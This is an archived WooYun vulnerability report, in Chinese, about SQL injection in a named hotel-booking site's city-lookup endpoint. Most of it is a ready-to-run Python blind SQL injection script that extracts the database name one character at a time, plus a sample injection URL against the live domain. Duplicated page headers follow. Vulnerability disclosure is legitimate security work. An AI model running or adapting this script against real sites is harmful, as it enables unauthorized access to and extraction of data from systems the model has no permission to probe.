青芒果主站存在SQL注入（附验证脚本） | wooyun-2015-0143503

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0143503

漏洞标题：

青芒果主站存在SQL注入（附验证脚本）

漏洞详情

披露状态：

2015-09-26：细节已通知厂商并且等待厂商处理中
2015-10-09：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

http://www.qmango.com/ajax/ajax_getcityinfo.asp?cityname=1' or len(db_name())=4 and '1'='1&l=0&tmp=1443028838999

脚本：

#encoding=utf-8
import httplib
import time
import string
import sys
import random
import urllib
import urllib2
headers = {  
           'User-Agent':'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6'  
        }  
payloads = list(string.ascii_lowercase)
payloads += list(string.ascii_uppercase)
for i in range(0,10):
    payloads.append(str(i))
payloads += ['@','_', '.', '-', '\\', ' ']
print 'Try to retrive DB:'
user = ''
for i in range(1,5):
    for payload in payloads:
 
            urlpre = "http://www.qmango.com/ajax/ajax_getcityinfo.asp?cityname=1%20%27%20or%20"
            urlmid = "ascii(substring(db_name(),%s,1))=%s" % (i, ord(payload))
            urlend = "and%20%271%27=%271&l=0&tmp=1443028838999"
            url = urlpre + urlmid + urlend
            req = urllib2.Request(url = url, headers = headers)
            res = urllib2.urlopen(req)
            html_doc = res.read()
            print '.',
            #print html_doc
            if html_doc.find('41') > 0:  # True
                user += payload
                print '\n[in progress]', user
print '\n[Done] DB is:', user

漏洞证明：

修复方案：

版权声明：转载请注明来源深度安全实验室@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-10-09 17:06

厂商回复：

漏洞Rank：4 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源深度安全实验室@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 深度安全实验室@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源深度安全实验室@乌云